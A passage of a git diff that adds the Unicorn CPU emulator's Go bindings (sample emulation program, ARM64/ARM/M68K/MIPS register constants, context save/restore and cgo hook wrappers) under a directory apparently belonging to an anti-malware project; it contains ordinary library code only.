space + if err := mu.MemMap(0x4000, 0x1000); err != nil { + return err + } + // set example register + if err := mu.RegWrite(uc.X86_REG_RDX, 1); err != nil { + return err + } + rdx, err := mu.RegRead(uc.X86_REG_RDX) + if err != nil { + return err + } + fmt.Printf("RDX is: %d\n", rdx) + + // start emulation + if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil { + return err + } + + // read back example register + rdx, err = mu.RegRead(uc.X86_REG_RDX) + if err != nil { + return err + } + fmt.Printf("RDX is now: %d\n", rdx) + return nil +} + +func main() { + if err := run(); err != nil { + fmt.Println(err) + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm64_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm64_const.go new file mode 100644 index 0000000..fb8dc90 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm64_const.go @@ -0,0 +1,314 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.go] +const ( + +// ARM64 registers + + ARM64_REG_INVALID = 0 + ARM64_REG_X29 = 1 + ARM64_REG_X30 = 2 + ARM64_REG_NZCV = 3 + ARM64_REG_SP = 4 + ARM64_REG_WSP = 5 + ARM64_REG_WZR = 6 + ARM64_REG_XZR = 7 + ARM64_REG_B0 = 8 + ARM64_REG_B1 = 9 + ARM64_REG_B2 = 10 + ARM64_REG_B3 = 11 + ARM64_REG_B4 = 12 + ARM64_REG_B5 = 13 + ARM64_REG_B6 = 14 + ARM64_REG_B7 = 15 + ARM64_REG_B8 = 16 + ARM64_REG_B9 = 17 + ARM64_REG_B10 = 18 + ARM64_REG_B11 = 19 + ARM64_REG_B12 = 20 + ARM64_REG_B13 = 21 + ARM64_REG_B14 = 22 + ARM64_REG_B15 = 23 + ARM64_REG_B16 = 24 + ARM64_REG_B17 = 25 + ARM64_REG_B18 = 26 + ARM64_REG_B19 = 27 + ARM64_REG_B20 = 28 + ARM64_REG_B21 = 29 + ARM64_REG_B22 = 30 + ARM64_REG_B23 = 31 + ARM64_REG_B24 = 32 + ARM64_REG_B25 = 33 + ARM64_REG_B26 = 34 + ARM64_REG_B27 = 35 + ARM64_REG_B28 = 36 + ARM64_REG_B29 = 37 + ARM64_REG_B30 = 38 + ARM64_REG_B31 = 39 + ARM64_REG_D0 = 40 + ARM64_REG_D1 = 41 + ARM64_REG_D2 = 42 + ARM64_REG_D3 = 43 + ARM64_REG_D4 = 44 + ARM64_REG_D5 = 45 + ARM64_REG_D6 = 46 + ARM64_REG_D7 = 47 + ARM64_REG_D8 = 48 + ARM64_REG_D9 = 49 + ARM64_REG_D10 = 50 + ARM64_REG_D11 = 51 + ARM64_REG_D12 = 52 + ARM64_REG_D13 = 53 + ARM64_REG_D14 = 54 + ARM64_REG_D15 = 55 + ARM64_REG_D16 = 56 + ARM64_REG_D17 = 57 + ARM64_REG_D18 = 58 + ARM64_REG_D19 = 59 + ARM64_REG_D20 = 60 + ARM64_REG_D21 = 61 + ARM64_REG_D22 = 62 + ARM64_REG_D23 = 63 + ARM64_REG_D24 = 64 + ARM64_REG_D25 = 65 + ARM64_REG_D26 = 66 + ARM64_REG_D27 = 67 + ARM64_REG_D28 = 68 + ARM64_REG_D29 = 69 + ARM64_REG_D30 = 70 + ARM64_REG_D31 = 71 + ARM64_REG_H0 = 72 + ARM64_REG_H1 = 73 + ARM64_REG_H2 = 74 + ARM64_REG_H3 = 75 + ARM64_REG_H4 = 76 + ARM64_REG_H5 = 77 + ARM64_REG_H6 = 78 + ARM64_REG_H7 = 79 + ARM64_REG_H8 = 80 + ARM64_REG_H9 = 81 + ARM64_REG_H10 = 82 + ARM64_REG_H11 = 83 + ARM64_REG_H12 = 84 + ARM64_REG_H13 = 85 + ARM64_REG_H14 = 86 + ARM64_REG_H15 = 87 + ARM64_REG_H16 = 88 + ARM64_REG_H17 = 89 + ARM64_REG_H18 = 90 + ARM64_REG_H19 = 91 + ARM64_REG_H20 = 92 + ARM64_REG_H21 = 93 + ARM64_REG_H22 = 94 + ARM64_REG_H23 = 95 + ARM64_REG_H24 = 96 + ARM64_REG_H25 = 97 + ARM64_REG_H26 = 98 + ARM64_REG_H27 = 99 + ARM64_REG_H28 = 100 + ARM64_REG_H29 = 101 + ARM64_REG_H30 = 102 + ARM64_REG_H31 = 103 + ARM64_REG_Q0 = 104 + ARM64_REG_Q1 = 105 + ARM64_REG_Q2 = 106 + ARM64_REG_Q3 = 107 + ARM64_REG_Q4 = 108 + ARM64_REG_Q5 = 109 + ARM64_REG_Q6 = 110 + ARM64_REG_Q7 = 111 + ARM64_REG_Q8 = 112 + ARM64_REG_Q9 = 113 + ARM64_REG_Q10 = 114 + ARM64_REG_Q11 = 115 + ARM64_REG_Q12 = 116 + ARM64_REG_Q13 = 117 + ARM64_REG_Q14 = 118 + ARM64_REG_Q15 = 119 + ARM64_REG_Q16 = 120 + ARM64_REG_Q17 = 121 + ARM64_REG_Q18 = 122 + ARM64_REG_Q19 = 123 + ARM64_REG_Q20 = 124 + ARM64_REG_Q21 = 125 + ARM64_REG_Q22 = 126 + ARM64_REG_Q23 = 127 + ARM64_REG_Q24 = 128 + ARM64_REG_Q25 = 129 + ARM64_REG_Q26 = 130 + ARM64_REG_Q27 = 131 + ARM64_REG_Q28 = 132 + ARM64_REG_Q29 = 133 + ARM64_REG_Q30 = 134 + ARM64_REG_Q31 = 135 + ARM64_REG_S0 = 136 + ARM64_REG_S1 = 137 + ARM64_REG_S2 = 138 + ARM64_REG_S3 = 139 + ARM64_REG_S4 = 140 + ARM64_REG_S5 = 141 + ARM64_REG_S6 = 142 + ARM64_REG_S7 = 143 + ARM64_REG_S8 = 144 + ARM64_REG_S9 = 145 + ARM64_REG_S10 = 146 + ARM64_REG_S11 = 147 + ARM64_REG_S12 = 148 + ARM64_REG_S13 = 149 + ARM64_REG_S14 = 150 + ARM64_REG_S15 = 151 + ARM64_REG_S16 = 152 + ARM64_REG_S17 = 153 + ARM64_REG_S18 = 154 + ARM64_REG_S19 = 155 + ARM64_REG_S20 = 156 + ARM64_REG_S21 = 157 + ARM64_REG_S22 = 158 + ARM64_REG_S23 = 159 + ARM64_REG_S24 = 160 + ARM64_REG_S25 = 161 + ARM64_REG_S26 = 162 + ARM64_REG_S27 = 163 + ARM64_REG_S28 = 164 + ARM64_REG_S29 = 165 + ARM64_REG_S30 = 166 + ARM64_REG_S31 = 167 + ARM64_REG_W0 = 168 + ARM64_REG_W1 = 169 + ARM64_REG_W2 = 170 + ARM64_REG_W3 = 171 + ARM64_REG_W4 = 172 + ARM64_REG_W5 = 173 + ARM64_REG_W6 = 174 + ARM64_REG_W7 = 175 + ARM64_REG_W8 = 176 + ARM64_REG_W9 = 177 + ARM64_REG_W10 = 178 + ARM64_REG_W11 = 179 + ARM64_REG_W12 = 180 + ARM64_REG_W13 = 181 + ARM64_REG_W14 = 182 + ARM64_REG_W15 = 183 + ARM64_REG_W16 = 184 + ARM64_REG_W17 = 185 + ARM64_REG_W18 = 186 + ARM64_REG_W19 = 187 + ARM64_REG_W20 = 188 + ARM64_REG_W21 = 189 + ARM64_REG_W22 = 190 + ARM64_REG_W23 = 191 + ARM64_REG_W24 = 192 + ARM64_REG_W25 = 193 + ARM64_REG_W26 = 194 + ARM64_REG_W27 = 195 + ARM64_REG_W28 = 196 + ARM64_REG_W29 = 197 + ARM64_REG_W30 = 198 + ARM64_REG_X0 = 199 + ARM64_REG_X1 = 200 + ARM64_REG_X2 = 201 + ARM64_REG_X3 = 202 + ARM64_REG_X4 = 203 + ARM64_REG_X5 = 204 + ARM64_REG_X6 = 205 + ARM64_REG_X7 = 206 + ARM64_REG_X8 = 207 + ARM64_REG_X9 = 208 + ARM64_REG_X10 = 209 + ARM64_REG_X11 = 210 + ARM64_REG_X12 = 211 + ARM64_REG_X13 = 212 + ARM64_REG_X14 = 213 + ARM64_REG_X15 = 214 + ARM64_REG_X16 = 215 + ARM64_REG_X17 = 216 + ARM64_REG_X18 = 217 + ARM64_REG_X19 = 218 + ARM64_REG_X20 = 219 + ARM64_REG_X21 = 220 + ARM64_REG_X22 = 221 + ARM64_REG_X23 = 222 + ARM64_REG_X24 = 223 + ARM64_REG_X25 = 224 + ARM64_REG_X26 = 225 + ARM64_REG_X27 = 226 + ARM64_REG_X28 = 227 + ARM64_REG_V0 = 228 + ARM64_REG_V1 = 229 + ARM64_REG_V2 = 230 + ARM64_REG_V3 = 231 + ARM64_REG_V4 = 232 + ARM64_REG_V5 = 233 + ARM64_REG_V6 = 234 + ARM64_REG_V7 = 235 + ARM64_REG_V8 = 236 + ARM64_REG_V9 = 237 + ARM64_REG_V10 = 238 + ARM64_REG_V11 = 239 + ARM64_REG_V12 = 240 + ARM64_REG_V13 = 241 + ARM64_REG_V14 = 242 + ARM64_REG_V15 = 243 + ARM64_REG_V16 = 244 + ARM64_REG_V17 = 245 + ARM64_REG_V18 = 246 + ARM64_REG_V19 = 247 + ARM64_REG_V20 = 248 + ARM64_REG_V21 = 249 + ARM64_REG_V22 = 250 + ARM64_REG_V23 = 251 + ARM64_REG_V24 = 252 + ARM64_REG_V25 = 253 + ARM64_REG_V26 = 254 + ARM64_REG_V27 = 255 + ARM64_REG_V28 = 256 + ARM64_REG_V29 = 257 + ARM64_REG_V30 = 258 + ARM64_REG_V31 = 259 + +// pseudo registers + ARM64_REG_PC = 260 + ARM64_REG_CPACR_EL1 = 261 + +// thread registers + ARM64_REG_TPIDR_EL0 = 262 + ARM64_REG_TPIDRRO_EL0 = 263 + ARM64_REG_TPIDR_EL1 = 264 + ARM64_REG_PSTATE = 265 + +// exception link registers + ARM64_REG_ELR_EL0 = 266 + ARM64_REG_ELR_EL1 = 267 + ARM64_REG_ELR_EL2 = 268 + ARM64_REG_ELR_EL3 = 269 + +// stack pointers registers + ARM64_REG_SP_EL0 = 270 + ARM64_REG_SP_EL1 = 271 + ARM64_REG_SP_EL2 = 272 + ARM64_REG_SP_EL3 = 273 + +// other CP15 registers + ARM64_REG_TTBR0_EL1 = 274 + ARM64_REG_TTBR1_EL1 = 275 + ARM64_REG_ESR_EL0 = 276 + ARM64_REG_ESR_EL1 = 277 + ARM64_REG_ESR_EL2 = 278 + ARM64_REG_ESR_EL3 = 279 + ARM64_REG_FAR_EL0 = 280 + ARM64_REG_FAR_EL1 = 281 + ARM64_REG_FAR_EL2 = 282 + ARM64_REG_FAR_EL3 = 283 + ARM64_REG_PAR_EL1 = 284 + ARM64_REG_MAIR_EL1 = 285 + ARM64_REG_VBAR_EL0 = 286 + ARM64_REG_VBAR_EL1 = 287 + ARM64_REG_VBAR_EL2 = 288 + ARM64_REG_VBAR_EL3 = 289 + ARM64_REG_ENDING = 290 + +// alias registers + ARM64_REG_IP0 = 215 + ARM64_REG_IP1 = 216 + ARM64_REG_FP = 1 + ARM64_REG_LR = 2 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm_const.go new file mode 100644 index 0000000..d4321c9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/arm_const.go @@ -0,0 +1,135 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm_const.go] +const ( + +// ARM registers + + ARM_REG_INVALID = 0 + ARM_REG_APSR = 1 + ARM_REG_APSR_NZCV = 2 + ARM_REG_CPSR = 3 + ARM_REG_FPEXC = 4 + ARM_REG_FPINST = 5 + ARM_REG_FPSCR = 6 + ARM_REG_FPSCR_NZCV = 7 + ARM_REG_FPSID = 8 + ARM_REG_ITSTATE = 9 + ARM_REG_LR = 10 + ARM_REG_PC = 11 + ARM_REG_SP = 12 + ARM_REG_SPSR = 13 + ARM_REG_D0 = 14 + ARM_REG_D1 = 15 + ARM_REG_D2 = 16 + ARM_REG_D3 = 17 + ARM_REG_D4 = 18 + ARM_REG_D5 = 19 + ARM_REG_D6 = 20 + ARM_REG_D7 = 21 + ARM_REG_D8 = 22 + ARM_REG_D9 = 23 + ARM_REG_D10 = 24 + ARM_REG_D11 = 25 + ARM_REG_D12 = 26 + ARM_REG_D13 = 27 + ARM_REG_D14 = 28 + ARM_REG_D15 = 29 + ARM_REG_D16 = 30 + ARM_REG_D17 = 31 + ARM_REG_D18 = 32 + ARM_REG_D19 = 33 + ARM_REG_D20 = 34 + ARM_REG_D21 = 35 + ARM_REG_D22 = 36 + ARM_REG_D23 = 37 + ARM_REG_D24 = 38 + ARM_REG_D25 = 39 + ARM_REG_D26 = 40 + ARM_REG_D27 = 41 + ARM_REG_D28 = 42 + ARM_REG_D29 = 43 + ARM_REG_D30 = 44 + ARM_REG_D31 = 45 + ARM_REG_FPINST2 = 46 + ARM_REG_MVFR0 = 47 + ARM_REG_MVFR1 = 48 + ARM_REG_MVFR2 = 49 + ARM_REG_Q0 = 50 + ARM_REG_Q1 = 51 + ARM_REG_Q2 = 52 + ARM_REG_Q3 = 53 + ARM_REG_Q4 = 54 + ARM_REG_Q5 = 55 + ARM_REG_Q6 = 56 + ARM_REG_Q7 = 57 + ARM_REG_Q8 = 58 + ARM_REG_Q9 = 59 + ARM_REG_Q10 = 60 + ARM_REG_Q11 = 61 + ARM_REG_Q12 = 62 + ARM_REG_Q13 = 63 + ARM_REG_Q14 = 64 + ARM_REG_Q15 = 65 + ARM_REG_R0 = 66 + ARM_REG_R1 = 67 + ARM_REG_R2 = 68 + ARM_REG_R3 = 69 + ARM_REG_R4 = 70 + ARM_REG_R5 = 71 + ARM_REG_R6 = 72 + ARM_REG_R7 = 73 + ARM_REG_R8 = 74 + ARM_REG_R9 = 75 + ARM_REG_R10 = 76 + ARM_REG_R11 = 77 + ARM_REG_R12 = 78 + ARM_REG_S0 = 79 + ARM_REG_S1 = 80 + ARM_REG_S2 = 81 + ARM_REG_S3 = 82 + ARM_REG_S4 = 83 + ARM_REG_S5 = 84 + ARM_REG_S6 = 85 + ARM_REG_S7 = 86 + ARM_REG_S8 = 87 + ARM_REG_S9 = 88 + ARM_REG_S10 = 89 + ARM_REG_S11 = 90 + ARM_REG_S12 = 91 + ARM_REG_S13 = 92 + ARM_REG_S14 = 93 + ARM_REG_S15 = 94 + ARM_REG_S16 = 95 + ARM_REG_S17 = 96 + ARM_REG_S18 = 97 + ARM_REG_S19 = 98 + ARM_REG_S20 = 99 + ARM_REG_S21 = 100 + ARM_REG_S22 = 101 + ARM_REG_S23 = 102 + ARM_REG_S24 = 103 + ARM_REG_S25 = 104 + ARM_REG_S26 = 105 + ARM_REG_S27 = 106 + ARM_REG_S28 = 107 + ARM_REG_S29 = 108 + ARM_REG_S30 = 109 + ARM_REG_S31 = 110 + ARM_REG_C1_C0_2 = 111 + ARM_REG_C13_C0_2 = 112 + ARM_REG_C13_C0_3 = 113 + ARM_REG_IPSR = 114 + ARM_REG_MSP = 115 + ARM_REG_PSP = 116 + ARM_REG_CONTROL = 117 + ARM_REG_ENDING = 118 + +// alias registers + ARM_REG_R13 = 12 + ARM_REG_R14 = 10 + ARM_REG_R15 = 11 + ARM_REG_SB = 75 + ARM_REG_SL = 76 + ARM_REG_FP = 77 + ARM_REG_IP = 78 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context.go new file mode 100644 index 0000000..3e8bcbf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context.go @@ -0,0 +1,29 @@ +package unicorn + +import ( + "runtime" + "unsafe" +) + +// #include +import "C" + +type Context **C.uc_context + +func (u *uc) ContextSave(reuse Context) (Context, error) { + ctx := reuse + if ctx == nil { + ctx = new(*C.uc_context) + } + if err := errReturn(C.uc_context_alloc(u.handle, ctx)); err != nil { + return nil, err + } + runtime.SetFinalizer(ctx, func(p Context) { C.uc_free(unsafe.Pointer(*p)) }) + if err := errReturn(C.uc_context_save(u.handle, *ctx)); err != nil { + } + return ctx, nil +} + +func (u *uc) ContextRestore(ctx Context) error { + return errReturn(C.uc_context_restore(u.handle, *ctx)) +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context_test.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context_test.go new file mode 100644 index 0000000..3231ef4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/context_test.go @@ -0,0 +1,26 @@ +package unicorn + +import ( + "testing" +) + +func TestContext(t *testing.T) { + u, err := NewUnicorn(ARCH_X86, MODE_32) + if err != nil { + t.Fatal(err) + } + u.RegWrite(X86_REG_EBP, 100) + ctx, err := u.ContextSave(nil) + if err != nil { + t.Fatal(err) + } + u.RegWrite(X86_REG_EBP, 200) + err = u.ContextRestore(ctx) + if err != nil { + t.Fatal(err) + } + val, _ := u.RegRead(X86_REG_EBP) + if val != 100 { + t.Fatal("context restore failed") + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.c b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.c new file mode 100644 index 0000000..a2b7dc9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.c @@ -0,0 +1,42 @@ +#include +#include "_cgo_export.h" + +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...); + + +uc_err uc_hook_add_wrap(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end) { + return uc_hook_add(handle, h2, type, callback, (void *)user, begin, end); +} + +uc_err uc_hook_add_insn(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end, int insn) { + return uc_hook_add(handle, h2, type, callback, (void *)user, begin, end, insn); +} + +void hookCode_cgo(uc_engine *handle, uint64_t addr, uint32_t size, uintptr_t user) { + hookCode(handle, addr, size, (void *)user); +} + +bool hookMemInvalid_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user) { + return hookMemInvalid(handle, type, addr, size, value, (void *)user); +} + +void hookMemAccess_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user) { + hookMemAccess(handle, type, addr, size, value, (void *)user); +} + +void hookInterrupt_cgo(uc_engine *handle, uint32_t intno, uintptr_t user) { + hookInterrupt(handle, intno, (void *)user); +} + +uint32_t hookX86In_cgo(uc_engine *handle, uint32_t port, uint32_t size, uintptr_t user) { + return hookX86In(handle, port, size, (void *)user); +} + +void hookX86Out_cgo(uc_engine *handle, uint32_t port, uint32_t size, uint32_t value, uintptr_t user) { + hookX86Out(handle, port, size, value, (void *)user); +} + +void hookX86Syscall_cgo(uc_engine *handle, uintptr_t user) { + hookX86Syscall(handle, (void *)user); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.go new file mode 100644 index 0000000..0d7fd68 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.go @@ -0,0 +1,153 @@ +package unicorn + +import ( + "errors" + "sync" + "unsafe" +) + +/* +#include +#include "hook.h" +*/ +import "C" + +type HookData struct { + Uc Unicorn + Callback interface{} +} + +type Hook uint64 + +type fastHookMap struct { + vals []*HookData + sync.RWMutex +} + +func (m *fastHookMap) insert(h *HookData) uintptr { + // don't change this to defer + m.Lock() + for i, v := range m.vals { + if v == nil { + m.vals[i] = h + m.Unlock() + return uintptr(i) + } + } + i := len(m.vals) + m.vals = append(m.vals, h) + m.Unlock() + return uintptr(i) +} + +func (m *fastHookMap) get(i unsafe.Pointer) *HookData { + m.RLock() + // TODO: nil check? + v := m.vals[uintptr(i)] + m.RUnlock() + return v +} + +func (m *fastHookMap) remove(i uintptr) { + m.Lock() + m.vals[i] = nil + m.Unlock() +} + +var hookMap fastHookMap + +//export hookCode +func hookCode(handle unsafe.Pointer, addr uint64, size uint32, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn, uint64, uint32))(hook.Uc, uint64(addr), uint32(size)) +} + +//export hookMemInvalid +func hookMemInvalid(handle unsafe.Pointer, typ C.uc_mem_type, addr uint64, size int, value int64, user unsafe.Pointer) bool { + hook := hookMap.get(user) + return hook.Callback.(func(Unicorn, int, uint64, int, int64) bool)(hook.Uc, int(typ), addr, size, value) +} + +//export hookMemAccess +func hookMemAccess(handle unsafe.Pointer, typ C.uc_mem_type, addr uint64, size int, value int64, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn, int, uint64, int, int64))(hook.Uc, int(typ), addr, size, value) +} + +//export hookInterrupt +func hookInterrupt(handle unsafe.Pointer, intno uint32, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn, uint32))(hook.Uc, intno) +} + +//export hookX86In +func hookX86In(handle unsafe.Pointer, port, size uint32, user unsafe.Pointer) uint32 { + hook := hookMap.get(user) + return hook.Callback.(func(Unicorn, uint32, uint32) uint32)(hook.Uc, port, size) +} + +//export hookX86Out +func hookX86Out(handle unsafe.Pointer, port, size, value uint32, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn, uint32, uint32, uint32))(hook.Uc, port, size, value) +} + +//export hookX86Syscall +func hookX86Syscall(handle unsafe.Pointer, user unsafe.Pointer) { + hook := hookMap.get(user) + hook.Callback.(func(Unicorn))(hook.Uc) +} + +func (u *uc) HookAdd(htype int, cb interface{}, begin, end uint64, extra ...int) (Hook, error) { + var callback unsafe.Pointer + var insn C.int + var insnMode bool + switch htype { + case HOOK_BLOCK, HOOK_CODE: + callback = C.hookCode_cgo + case HOOK_MEM_READ, HOOK_MEM_WRITE, HOOK_MEM_READ | HOOK_MEM_WRITE: + callback = C.hookMemAccess_cgo + case HOOK_INTR: + callback = C.hookInterrupt_cgo + case HOOK_INSN: + insn = C.int(extra[0]) + insnMode = true + switch insn { + case X86_INS_IN: + callback = C.hookX86In_cgo + case X86_INS_OUT: + callback = C.hookX86Out_cgo + case X86_INS_SYSCALL, X86_INS_SYSENTER: + callback = C.hookX86Syscall_cgo + default: + return 0, errors.New("Unknown instruction type.") + } + default: + // special case for mask + if htype&(HOOK_MEM_READ_UNMAPPED|HOOK_MEM_WRITE_UNMAPPED|HOOK_MEM_FETCH_UNMAPPED| + HOOK_MEM_READ_PROT|HOOK_MEM_WRITE_PROT|HOOK_MEM_FETCH_PROT) != 0 { + callback = C.hookMemInvalid_cgo + } else { + return 0, errors.New("Unknown hook type.") + } + } + var h2 C.uc_hook + data := &HookData{u, cb} + uptr := hookMap.insert(data) + if insnMode { + C.uc_hook_add_insn(u.handle, &h2, C.uc_hook_type(htype), callback, C.uintptr_t(uptr), C.uint64_t(begin), C.uint64_t(end), insn) + } else { + C.uc_hook_add_wrap(u.handle, &h2, C.uc_hook_type(htype), callback, C.uintptr_t(uptr), C.uint64_t(begin), C.uint64_t(end)) + } + // TODO: could move Hook and uptr onto HookData and just return it + u.hooks[Hook(h2)] = uptr + return Hook(h2), nil +} + +func (u *uc) HookDel(hook Hook) error { + if uptr, ok := u.hooks[hook]; ok { + delete(u.hooks, hook) + hookMap.remove(uptr) + } + return errReturn(C.uc_hook_del(u.handle, C.uc_hook(hook))) +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.h b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.h new file mode 100644 index 0000000..35813a0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/hook.h @@ -0,0 +1,9 @@ +uc_err uc_hook_add_wrap(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end); +uc_err uc_hook_add_insn(uc_engine *handle, uc_hook *h2, uc_hook_type type, void *callback, uintptr_t user, uint64_t begin, uint64_t end, int insn); +void hookCode_cgo(uc_engine *handle, uint64_t addr, uint32_t size, uintptr_t user); +bool hookMemInvalid_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user); +void hookMemAccess_cgo(uc_engine *handle, uc_mem_type type, uint64_t addr, int size, int64_t value, uintptr_t user); +void hookInterrupt_cgo(uc_engine *handle, uint32_t intno, uintptr_t user); +uint32_t hookX86In_cgo(uc_engine *handle, uint32_t port, uint32_t size, uintptr_t user); +void hookX86Out_cgo(uc_engine *handle, uint32_t port, uint32_t size, uint32_t value, uintptr_t user); +void hookX86Syscall_cgo(uc_engine *handle, uintptr_t user); diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/m68k_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/m68k_const.go new file mode 100644 index 0000000..36ba914 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/m68k_const.go @@ -0,0 +1,27 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.go] +const ( + +// M68K registers + + M68K_REG_INVALID = 0 + M68K_REG_A0 = 1 + M68K_REG_A1 = 2 + M68K_REG_A2 = 3 + M68K_REG_A3 = 4 + M68K_REG_A4 = 5 + M68K_REG_A5 = 6 + M68K_REG_A6 = 7 + M68K_REG_A7 = 8 + M68K_REG_D0 = 9 + M68K_REG_D1 = 10 + M68K_REG_D2 = 11 + M68K_REG_D3 = 12 + M68K_REG_D4 = 13 + M68K_REG_D5 = 14 + M68K_REG_D6 = 15 + M68K_REG_D7 = 16 + M68K_REG_SR = 17 + M68K_REG_PC = 18 + M68K_REG_ENDING = 19 +) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/mips_const.go b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/mips_const.go new file mode 100644 index 0000000..df3f2c0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/go/unicorn/mips_const.go @@ -0,0 +1,200 @@ +package unicorn +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.go] +const ( + +// MIPS registers + + MIPS_REG_INVALID = 0 + +// General purpose registers + MIPS_REG_PC = 1 + MIPS_REG_0 = 2 + MIPS_REG_1 = 3 + MIPS_REG_2 = 4 + MIPS_REG_3 = 5 + MIPS_REG_4 = 6 + MIPS_REG_5 = 7 + MIPS_REG_6 = 8 + MIPS_REG_7 = 9 + MIPS_REG_8 = 10 + MIPS_REG_9 = 11 + MIPS_REG_10 = 12 + MIPS_REG_11 = 13 + MIPS_REG_12 = 14 + MIPS_REG_13 = 15 + MIPS_REG_14 = 16 + MIPS_REG_15 = 17 + MIPS_REG_16 = 18 + MIPS_REG_17 = 19 + MIPS_REG_18 = 20 + MIPS_REG_19 = 21 + MIPS_REG_20 = 22 + MIPS_REG_21 = 23 + MIPS_REG_22 = 24 + MIPS_REG_23 = 25 + MIPS_REG_24 = 26 + MIPS_REG_25 = 27 + MIPS_REG_26 = 28 + MIPS_REG_27 = 29 + MIPS_REG_28 = 30 + MIPS_REG_29 = 31 + MIPS_REG_30 = 32 + MIPS_REG_31 = 33 + +// DSP registers + MIPS_REG_DSPCCOND = 34 + MIPS_REG_DSPCARRY = 35 + MIPS_REG_DSPEFI = 36 + MIPS_REG_DSPOUTFLAG = 37 + MIPS_REG_DSPOUTFLAG16_19 = 38 + MIPS_REG_DSPOUTFLAG20 = 39 + MIPS_REG_DSPOUTFLAG21 = 40 + MIPS_REG_DSPOUTFLAG22 = 41 + MIPS_REG_DSPOUTFLAG23 = 42 + MIPS_REG_DSPPOS = 43 + MIPS_REG_DSPSCOUNT = 44 + +// ACC registers + MIPS_REG_AC0 = 45 + MIPS_REG_AC1 = 46 + MIPS_REG_AC2 = 47 + MIPS_REG_AC3 = 48 + +// COP registers + MIPS_REG_CC0 = 49 + MIPS_REG_CC1 = 50 + MIPS_REG_CC2 = 51 + MIPS_REG_CC3 = 52 + MIPS_REG_CC4 = 53 + MIPS_REG_CC5 = 54 + MIPS_REG_CC6 = 55 + MIPS_REG_CC7 = 56 + +// FPU registers + MIPS_REG_F0 = 57 + MIPS_REG_F1 = 58 + MIPS_REG_F2 = 59 + MIPS_REG_F3 = 60 + MIPS_REG_F4 = 61 + MIPS_REG_F5 = 62 + MIPS_REG_F6 = 63 + MIPS_REG_F7 = 64 + MIPS_REG_F8 = 65 + MIPS_REG_F9 = 66 + MIPS_REG_F10 = 67 + MIPS_REG_F11 = 68 + MIPS_REG_F12 = 69 + MIPS_REG_F13 = 70 + MIPS_REG_F14 = 71 + MIPS_REG_F15 = 72 + MIPS_REG_F16 = 73 + MIPS_REG_F17 = 74 + MIPS_REG_F18 = 75 + MIPS_REG_F19 = 76 + MIPS_REG_F20 = 77 + MIPS_REG_F21 = 78 + MIPS_REG_F22 = 79 + MIPS_REG_F23 = 80 + MIPS_REG_F24 = 81 + MIPS_REG_F25 = 82 + MIPS_REG_F26 = 83 + MIPS_REG_F27 = 84 + MIPS_REG_F28 = 85 + MIPS_REG_F29 = 86 + MIPS_REG_F30 = 87 + MIPS_REG_F31 = 88 + MIPS_REG_FCC0 = 89 + MIPS_REG_FCC1 = 90 + MIPS_REG_FCC2 = 91 + MIPS_REG_FCC3 = 92 + MIPS_REG_FCC4 = 93 + MIPS_REG_FCC5 = 94 + MIPS_REG_FCC6 = 95 + MIPS_REG_FCC7 = 96 + +// AFPR128 + MIPS_REG_W0 = 97 + MIPS_REG_W1 = 98 + MIPS_REG_W2 = 99 + 